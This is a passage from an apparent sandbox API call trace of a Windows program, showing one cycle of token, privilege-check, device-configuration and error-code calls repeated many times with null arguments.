pulLen=0x0) returned 0x3 [0016.839] GetLastError () returned 0x578 [0016.839] SetLastError (dwErrCode=0x578) [0016.839] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.839] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.839] GetCurrentThread () returned 0xfffffffe [0016.839] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.839] GetLastError () returned 0x3f0 [0016.839] GetCurrentProcess () returned 0xffffffff [0016.839] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.839] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.839] SetLastError (dwErrCode=0x522) [0016.839] CloseHandle (hObject=0x114) returned 1 [0016.840] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.840] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.840] GetLastError () returned 0x578 [0016.840] SetLastError (dwErrCode=0x578) [0016.840] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.840] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.840] GetCurrentThread () returned 0xfffffffe [0016.840] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.840] GetLastError () returned 0x3f0 [0016.840] GetCurrentProcess () returned 0xffffffff [0016.840] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.840] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.840] SetLastError (dwErrCode=0x522) [0016.840] CloseHandle (hObject=0x114) returned 1 [0016.840] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.840] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.840] GetLastError () returned 0x578 [0016.840] SetLastError (dwErrCode=0x578) [0016.840] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.840] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.840] GetCurrentThread () returned 0xfffffffe [0016.840] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.840] GetLastError () returned 0x3f0 [0016.840] GetCurrentProcess () returned 0xffffffff [0016.840] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.841] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.841] SetLastError (dwErrCode=0x522) [0016.841] CloseHandle (hObject=0x114) returned 1 [0016.841] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.841] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.841] GetLastError () returned 0x578 [0016.841] SetLastError (dwErrCode=0x578) [0016.841] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.841] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.841] GetCurrentThread () returned 0xfffffffe [0016.841] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.841] GetLastError () returned 0x3f0 [0016.841] GetCurrentProcess () returned 0xffffffff [0016.841] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.841] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.841] SetLastError (dwErrCode=0x522) [0016.841] CloseHandle (hObject=0x114) returned 1 [0016.841] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.841] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.841] GetLastError () returned 0x578 [0016.841] SetLastError (dwErrCode=0x578) [0016.841] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.841] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.841] GetCurrentThread () returned 0xfffffffe [0016.841] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.842] GetLastError () returned 0x3f0 [0016.842] GetCurrentProcess () returned 0xffffffff [0016.842] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.842] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.842] SetLastError (dwErrCode=0x522) [0016.842] CloseHandle (hObject=0x114) returned 1 [0016.842] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.842] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.842] GetLastError () returned 0x578 [0016.842] SetLastError (dwErrCode=0x578) [0016.842] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.842] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.842] GetCurrentThread () returned 0xfffffffe [0016.842] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.842] GetLastError () returned 0x3f0 [0016.842] GetCurrentProcess () returned 0xffffffff [0016.842] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.842] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.842] SetLastError (dwErrCode=0x522) [0016.842] CloseHandle (hObject=0x114) returned 1 [0016.842] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.842] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.842] GetLastError () returned 0x578 [0016.842] SetLastError (dwErrCode=0x578) [0016.842] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.843] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.843] GetCurrentThread () returned 0xfffffffe [0016.843] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.843] GetLastError () returned 0x3f0 [0016.843] GetCurrentProcess () returned 0xffffffff [0016.843] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.843] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.843] SetLastError (dwErrCode=0x522) [0016.843] CloseHandle (hObject=0x114) returned 1 [0016.843] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.843] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.843] GetLastError () returned 0x578 [0016.843] SetLastError (dwErrCode=0x578) [0016.843] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.843] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.843] GetCurrentThread () returned 0xfffffffe [0016.843] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.843] GetLastError () returned 0x3f0 [0016.843] GetCurrentProcess () returned 0xffffffff [0016.843] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.843] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.843] SetLastError (dwErrCode=0x522) [0016.843] CloseHandle (hObject=0x114) returned 1 [0016.843] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.843] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.844] GetLastError () returned 0x578 [0016.844] SetLastError (dwErrCode=0x578) [0016.844] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.844] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.844] GetCurrentThread () returned 0xfffffffe [0016.844] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.844] GetLastError () returned 0x3f0 [0016.844] GetCurrentProcess () returned 0xffffffff [0016.844] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.844] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.844] SetLastError (dwErrCode=0x522) [0016.844] CloseHandle (hObject=0x114) returned 1 [0016.844] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.844] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.844] GetLastError () returned 0x578 [0016.844] SetLastError (dwErrCode=0x578) [0016.844] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.844] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.845] GetCurrentThread () returned 0xfffffffe [0016.845] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.845] GetLastError () returned 0x3f0 [0016.845] GetCurrentProcess () returned 0xffffffff [0016.845] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.845] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.845] SetLastError (dwErrCode=0x522) [0016.845] CloseHandle (hObject=0x114) returned 1 [0016.845] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.845] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.845] GetLastError () returned 0x578 [0016.845] SetLastError (dwErrCode=0x578) [0016.845] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.845] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.845] GetCurrentThread () returned 0xfffffffe [0016.845] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.845] GetLastError () returned 0x3f0 [0016.845] GetCurrentProcess () returned 0xffffffff [0016.845] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.845] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.845] SetLastError (dwErrCode=0x522) [0016.845] CloseHandle (hObject=0x114) returned 1 [0016.845] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.845] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.845] GetLastError () returned 0x578 [0016.846] SetLastError (dwErrCode=0x578) [0016.846] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.846] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.846] GetCurrentThread () returned 0xfffffffe [0016.846] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.846] GetLastError () returned 0x3f0 [0016.846] GetCurrentProcess () returned 0xffffffff [0016.846] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.846] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.846] SetLastError (dwErrCode=0x522) [0016.846] CloseHandle (hObject=0x114) returned 1 [0016.846] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.846] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.846] GetLastError () returned 0x578 [0016.846] SetLastError (dwErrCode=0x578) [0016.846] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.846] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.846] GetCurrentThread () returned 0xfffffffe [0016.846] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.846] GetLastError () returned 0x3f0 [0016.846] GetCurrentProcess () returned 0xffffffff [0016.846] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.846] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.846] SetLastError (dwErrCode=0x522) [0016.846] CloseHandle (hObject=0x114) returned 1 [0016.847] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.847] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.847] GetLastError () returned 0x578 [0016.847] SetLastError (dwErrCode=0x578) [0016.847] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.847] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.847] GetCurrentThread () returned 0xfffffffe [0016.847] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.847] GetLastError () returned 0x3f0 [0016.847] GetCurrentProcess () returned 0xffffffff [0016.847] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.847] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.847] SetLastError (dwErrCode=0x522) [0016.847] CloseHandle (hObject=0x114) returned 1 [0016.847] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.847] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.847] GetLastError () returned 0x578 [0016.847] SetLastError (dwErrCode=0x578) [0016.847] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.847] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.847] GetCurrentThread () returned 0xfffffffe [0016.847] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.847] GetLastError () returned 0x3f0 [0016.847] GetCurrentProcess () returned 0xffffffff [0016.848] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.848] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.848] SetLastError (dwErrCode=0x522) [0016.848] CloseHandle (hObject=0x114) returned 1 [0016.848] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.848] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.848] GetLastError () returned 0x578 [0016.848] SetLastError (dwErrCode=0x578) [0016.848] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.848] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.848] GetCurrentThread () returned 0xfffffffe [0016.848] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.848] GetLastError () returned 0x3f0 [0016.848] GetCurrentProcess () returned 0xffffffff [0016.848] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.848] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.848] SetLastError (dwErrCode=0x522) [0016.848] CloseHandle (hObject=0x114) returned 1 [0016.848] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.848] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.848] GetLastError () returned 0x578 [0016.848] SetLastError (dwErrCode=0x578) [0016.848] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.848] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.848] GetCurrentThread () returned 0xfffffffe [0016.848] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.849] GetLastError () returned 0x3f0 [0016.849] GetCurrentProcess () returned 0xffffffff [0016.849] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.849] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.849] SetLastError (dwErrCode=0x522) [0016.849] CloseHandle (hObject=0x114) returned 1 [0016.849] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.849] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.849] GetLastError () returned 0x578 [0016.849] SetLastError (dwErrCode=0x578) [0016.849] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.849] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.849] GetCurrentThread () returned 0xfffffffe [0016.849] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.849] GetLastError () returned 0x3f0 [0016.849] GetCurrentProcess () returned 0xffffffff [0016.849] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.849] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.849] SetLastError (dwErrCode=0x522) [0016.849] CloseHandle (hObject=0x114) returned 1 [0016.849] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.849] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.849] GetLastError () returned 0x578 [0016.849] SetLastError (dwErrCode=0x578) [0016.850] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.850] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.850] GetCurrentThread () returned 0xfffffffe [0016.850] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.850] GetLastError () returned 0x3f0 [0016.850] GetCurrentProcess () returned 0xffffffff [0016.850] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.850] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.850] SetLastError (dwErrCode=0x522) [0016.850] CloseHandle (hObject=0x114) returned 1 [0016.850] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.850] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.850] GetLastError () returned 0x578 [0016.850] SetLastError (dwErrCode=0x578) [0016.850] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.850] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.850] GetCurrentThread () returned 0xfffffffe [0016.850] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.850] GetLastError () returned 0x3f0 [0016.850] GetCurrentProcess () returned 0xffffffff [0016.850] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.850] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.850] SetLastError (dwErrCode=0x522) [0016.850] CloseHandle (hObject=0x114) returned 1 [0016.850] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.851] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.851] GetLastError () returned 0x578 [0016.851] SetLastError (dwErrCode=0x578) [0016.851] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.851] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.851] GetCurrentThread () returned 0xfffffffe [0016.851] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.851] GetLastError () returned 0x3f0 [0016.851] GetCurrentProcess () returned 0xffffffff [0016.851] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.851] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.851] SetLastError (dwErrCode=0x522) [0016.851] CloseHandle (hObject=0x114) returned 1 [0016.851] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.851] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.851] GetLastError () returned 0x578 [0016.851] SetLastError (dwErrCode=0x578) [0016.851] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.851] GetPriorityClass (hProcess=0x0) returned 